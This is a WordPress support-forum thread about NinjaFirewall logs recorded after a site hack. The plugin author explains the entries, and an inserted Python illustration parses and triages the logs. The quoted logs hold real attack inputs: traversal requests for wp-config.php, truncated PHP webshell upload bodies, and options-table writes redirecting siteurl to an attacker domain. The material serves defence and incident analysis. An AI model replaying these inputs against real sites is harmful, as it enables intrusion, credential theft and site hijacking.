• Resolved lws-mo

    (@lws-mo)


    Hi there,
    one of our sites got hacked; it seems to have been the recent Easy SMTP plugin attempt.

    Besides other changes, I installed your firewall plugin on the site.
    Now I can see the attacks in the firewall log.

    Besides attempts to change the wp_options table, I also got logs of “Code Injection”.
    Maybe you can briefly explain/clarify these logs for me?

    21/Mar/19 17:16:23  #7144190  UPLOAD       -  192.99.15.139    POST /wp-admin/admin-post.php - File upload detected, no action taken - [rock.zip (2,860 bytes)] - mail.xxxxx.com
    21/Mar/19 17:16:23  #7383333  CRITICAL  1407  192.99.15.139    POST /wp-admin/admin-post.php - Unrestricted file upload - [GET:page = wysija_campaigns] - mail.xxxxx.com
    21/Mar/19 17:16:54  #4900521  UPLOAD       -  192.99.15.139    POST /wp-admin/admin-post.php - File upload detected, no action taken - [settings_auto.php (925 bytes)] - mail.xxxxx.com
    21/Mar/19 17:17:17  #1852218  CRITICAL   155  192.99.15.139    POST /wp-admin/admin-ajax.php - Code injection - [POST:--b40265e60d5f25c1440f8db641ea5d6f%0d%0aContent-Disposition:_form-data;_name = "popimg"; filename="settings_auto.php"%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>%0d%0a<?php%0d%0afunction http_get($url){%0d%0a%09$im = c...] - mail.xxxxx.com
    21/Mar/19 17:17:23  #3186679  CRITICAL   155  192.99.15.139    POST /index.php - Code injection - [POST:--836475a2fc97d3edcbb4a39618d84de2%0d%0aContent-Disposition:_form-data;_name = "file"; filename="files/settings_auto.php"%0d%0aContent-Type: multipart/form-data%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>%0d%0a<?...] - mail.xxxxx.com
    21/Mar/19 17:17:40  #7238211  CRITICAL  1515  192.99.15.139    GET /index.php - Unauthorized action - [GET:up_auto_log = true] - mail.xxxxx.com
    21/Mar/19 17:18:08  #2792593  CRITICAL   155  192.99.15.139    POST /wp-admin/admin-ajax.php - Code injection - [POST:--d083b06a6c24c0921269d254ec41188f%0d%0aContent-Disposition:_form-data;_name = "action"%0d%0a%0d%0anm_personalizedproduct_upload_file%0d%0a--d083b06a6c24c0921269d254ec41188f%0d%0aContent-Disposition: form-data; name...] - mail.xxxxx.com
    21/Mar/19 17:18:17  #8139554  CRITICAL     1  192.99.15.139    GET /index.php - Directory traversal - [GET:path = ../../../../../wp-config.php] - mail.xxxxx.com
    21/Mar/19 17:18:30  #8476871  CRITICAL     1  192.99.15.139    GET /index.php - Directory traversal - [GET:pic = ../../../../../wp-config.php] - mail.xxxxx.com
    21/Mar/19 17:18:33  #1356479  CRITICAL   155  192.99.15.139    POST /index.php - Code injection - [POST:--6e73917032ae1df5b2a8bf273afccdc8%0d%0aContent-Disposition:_form-data;_name = "Filedata"; filename="files/settings_auto.php"%0d%0aContent-Type: multipart/form-data%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>...] - mail.xxxxx.com

    and

    22/Mar/19 06:52:31  #4905596  CRITICAL  1353  138.197.142.212  POST /wp-admin/admin-ajax.php - Attempt to modify options table - [POST:data = {"type":"save_setting","append":false,"option":"siteurl","value" :"https://strangefullthiggngs.com/rekjhtge"}] - xxxxx.com
    22/Mar/19 06:52:37  #5157617  CRITICAL  1353  138.197.142.212  POST /wp-admin/admin-ajax.php - Attempt to modify options table - [POST:data = {"type":"save_setting","append":false,"option":"home","value" :"https://strangefullthiggngs.com/32qjhgfaa.php"}] - xxxxx.com
Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Author nintechnet

    (@nintechnet)

    Hi,

    21/Mar/19 17:16:23  #7144190  UPLOAD       -  192.99.15.139    POST /wp-admin/admin-post.php - File upload detected, no action taken - [rock.zip (2,860 bytes)] - mail.xxxxx.com
    21/Mar/19 17:16:54  #4900521  UPLOAD       -  192.99.15.139    POST /wp-admin/admin-post.php - File upload detected, no action taken - [settings_auto.php (925 bytes)] - mail.xxxxx.com
    

    The way NinjaFirewall and PHP handle uploads is explained in those threads:
    https://www.ads-software.com/support/topic/file-upload-detected/
    https://www.ads-software.com/support/topic/were-these-files-blocked/

    If only you, the admin, are allowed to upload files, consider disabling them in the Firewall Policies page. See this post for more details: https://blog.nintechnet.com/securing-wordpress-with-a-web-application-firewall-ninjafirewall/ (scroll down to “File Uploads”).

    21/Mar/19 17:16:23  #7383333  CRITICAL  1407  192.99.15.139    POST /wp-admin/admin-post.php - Unrestricted file upload - [GET:page = wysija_campaigns] - mail.xxxxx.com
    21/Mar/19 17:17:40  #7238211  CRITICAL  1515  192.99.15.139    GET /index.php - Unauthorized action - [GET:up_auto_log = true] - mail.xxxxx.com
    21/Mar/19 17:18:17  #8139554  CRITICAL     1  192.99.15.139    GET /index.php - Directory traversal - [GET:path = ../../../../../wp-config.php] - mail.xxxxx.com
    21/Mar/19 17:18:30  #8476871  CRITICAL     1  192.99.15.139    GET /index.php - Directory traversal - [GET:pic = ../../../../../wp-config.php] - mail.xxxxx.com
    

    Those are known issues, and there’s nothing to worry about. They’re attempting to exploit very old vulnerabilities.

    21/Mar/19 17:17:17  #1852218  CRITICAL   155  192.99.15.139    POST /wp-admin/admin-ajax.php - Code injection - [POST:--b40265e60d5f25c1440f8db641ea5d6f%0d%0aContent-Disposition:_form-data;_name = "popimg"; filename="settings_auto.php"%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>%0d%0a<?php%0d%0afunction http_get($url){%0d%0a%09$im = c...] - mail.xxxxx.com
    21/Mar/19 17:17:23  #3186679  CRITICAL   155  192.99.15.139    POST /index.php - Code injection - [POST:--836475a2fc97d3edcbb4a39618d84de2%0d%0aContent-Disposition:_form-data;_name = "file"; filename="files/settings_auto.php"%0d%0aContent-Type: multipart/form-data%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>%0d%0a<?...] - mail.xxxxx.com
    21/Mar/19 17:18:08  #2792593  CRITICAL   155  192.99.15.139    POST /wp-admin/admin-ajax.php - Code injection - [POST:--d083b06a6c24c0921269d254ec41188f%0d%0aContent-Disposition:_form-data;_name = "action"%0d%0a%0d%0anm_personalizedproduct_upload_file%0d%0a--d083b06a6c24c0921269d254ec41188f%0d%0aContent-Disposition: form-data; name...] - mail.xxxxx.com
    21/Mar/19 17:18:33  #1356479  CRITICAL   155  192.99.15.139    POST /index.php - Code injection - [POST:--6e73917032ae1df5b2a8bf273afccdc8%0d%0aContent-Disposition:_form-data;_name = "Filedata"; filename="files/settings_auto.php"%0d%0aContent-Type: multipart/form-data%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>...] - mail.xxxxx.com
    

    Those ones are very odd! To me, that looks like they come from a script kiddie who is learning how to use cURL but forgot to read its man page: he’s hoping to upload files using HTTP POST data rather than HTTP multipart POST data, hence the mess! I would not worry more than that, the firewall kicked him out anyway.

    The last two (#1353) are attempts to exploit the WP GDPR Compliance plugin vulnerability that was patched last November.

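    An added illustration (my own code, not from either poster and not NinjaFirewall's own parser) of the two things nintechnet explains above. First, why a multipart body that is POSTed without a multipart Content-Type lands in the log as a single "POST" field named "--<boundary>%0d%0aContent-Disposition:_form-data;_name": PHP fills $_POST by splitting on "&" and on the first "=", and it rewrites spaces and dots in field names to underscores, so the whole multipart envelope becomes the key and the filename plus file contents become the value. Second, a small triage pass over NinjaFirewall-style log lines that separates "logged only" UPLOAD entries (which the firewall passed through to PHP) from blocked CRITICAL ones. The multipart body, the placeholder PHP in it and the sample log lines are constructed here, modelled on the truncated entries in the thread; the host name in the samples is a stand-in.

```python
import re
from email import message_from_bytes
from urllib.parse import unquote_plus

# --- Part 1: a multipart body sent as a plain POST, as PHP and the firewall see it ---

BOUNDARY = "b40265e60d5f25c1440f8db641ea5d6f"

# Constructed body modelled on the truncated #155 entries above. The PHP is a
# harmless placeholder, not the attacker's script.
RAW_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="popimg"; filename="settings_auto.php"\r\n'
    "\r\n"
    "<title>Vuln!! patch it Now!</title>\r\n"
    "<?php echo 'placeholder'; ?>\r\n"
    f"--{BOUNDARY}--\r\n"
)


def php_post_fields(body: str) -> dict:
    """Approximate how PHP builds $_POST when the request carries no multipart
    Content-Type: split on '&', then on the FIRST '=', url-decode, and map
    spaces/dots in the key to underscores (PHP's variable-name rewriting).
    The first '=' in a multipart envelope is the one in name="...", so the
    envelope becomes the key and the filename + file contents the value."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        key = unquote_plus(key).replace(" ", "_").replace(".", "_")
        fields[key] = unquote_plus(value)
    return fields


def multipart_parts(body: str, boundary: str) -> list:
    """The same body with the correct Content-Type: one part carrying a
    filename, i.e. something PHP would route to $_FILES rather than $_POST.
    The stdlib email parser understands multipart, so we prepend the header."""
    raw = (f"Content-Type: multipart/form-data; boundary={boundary}\r\n\r\n" + body).encode()
    msg = message_from_bytes(raw)
    return [
        {
            "name": part.get_param("name", header="content-disposition"),
            "filename": part.get_filename(),
            "content": part.get_payload(),
        }
        for part in msg.get_payload()
    ]


# --- Part 2: triage of NinjaFirewall-style log lines ---

LOG_RE = re.compile(
    r"^(?P<time>\S+ \S+)\s+#(?P<id>\d+)\s+(?P<level>\S+)\s+(?P<rule>\S+)\s+"
    r"(?P<ip>\S+)\s+(?P<method>\S+)\s+(?P<uri>\S+) - (?P<msg>.*?) - "
    r"\[(?P<detail>.*)\] - (?P<host>\S+)$"
)

# Constructed sample modelled on the entries posted in this thread (host replaced).
SAMPLE_LOG = """\
21/Mar/19 17:16:54  #4900521  UPLOAD       -  192.99.15.139    POST /wp-admin/admin-post.php - File upload detected, no action taken - [settings_auto.php (925 bytes)] - example.com
21/Mar/19 17:18:17  #8139554  CRITICAL     1  192.99.15.139    GET /index.php - Directory traversal - [GET:path = ../../../../../wp-config.php] - example.com
22/Mar/19 06:52:31  #4905596  CRITICAL  1353  138.197.142.212  POST /wp-admin/admin-ajax.php - Attempt to modify options table - [POST:data = {"type":"save_setting","append":false,"option":"siteurl","value" :"https://example.invalid/x"}] - example.com
"""

SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")


def parse_log(text: str) -> list:
    """Parse each line into its fields; lines that do not match are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def triage(entries: list) -> dict:
    """Per source IP: entries the firewall only logged (UPLOAD, no rule id, so
    the file reached PHP) versus entries it blocked (CRITICAL with a rule id),
    plus uploaded script files worth looking for on disk."""
    report = {}
    for e in entries:
        r = report.setdefault(e["ip"], {"blocked": [], "logged_only": [], "php_uploads": []})
        if e["level"] == "UPLOAD":
            r["logged_only"].append(e["id"])
            name = e["detail"].split(" (")[0]  # "settings_auto.php (925 bytes)" -> file name
            if name.lower().endswith(SCRIPT_EXTS):
                r["php_uploads"].append(name)
        else:
            r["blocked"].append((e["rule"], e["msg"]))
    return report
```

    The point of the triage split: "File upload detected, no action taken" means NinjaFirewall handed the file to PHP, so whether settings_auto.php ended up on disk depends on the plugin that received it; the uploads directory is worth checking for it, whereas the CRITICAL entries were rejected by the firewall.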
    Thread Starter lws-mo

    (@lws-mo)

    Hi nintechnet,

    thank you very much for the quick reply and your input!

    I have now disabled uploads with your plugin.

    Thanks again for the great support.
    It's the first time I am using your plugin; I will suggest using it on other sites as well. Will leave a review!

  • The topic ‘Question about some logs after hack’ is closed to new replies.